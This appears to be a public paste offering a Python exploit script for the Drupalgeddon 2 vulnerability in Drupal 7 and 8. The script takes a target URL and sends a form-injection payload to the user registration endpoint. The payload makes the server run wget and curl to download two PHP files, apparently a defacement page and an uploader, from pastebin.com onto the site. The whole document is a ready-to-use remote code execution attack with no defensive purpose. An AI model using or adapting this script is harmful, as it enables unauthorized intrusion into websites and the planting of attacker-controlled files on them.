cdw1p icon

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-76

cdw1p | PRO | 04/14/19 04:39:03 PM UTC | 0 ⭐ | 624 👁️ | Never ⏰ | []
Bash |

590 B

|

None

|

0 👍

/

0 👎

#!/usr/bin/env
import sys
import requests
target = raw_input('\nEnter target : ')
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget -O ind.php https://pastebin.com/raw/fnLcE8mP && curl -o uploader.php https://pastebin.com/raw/YZDbxXmX'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'/ind.php or '+target+'/uploader.php\n')

Comments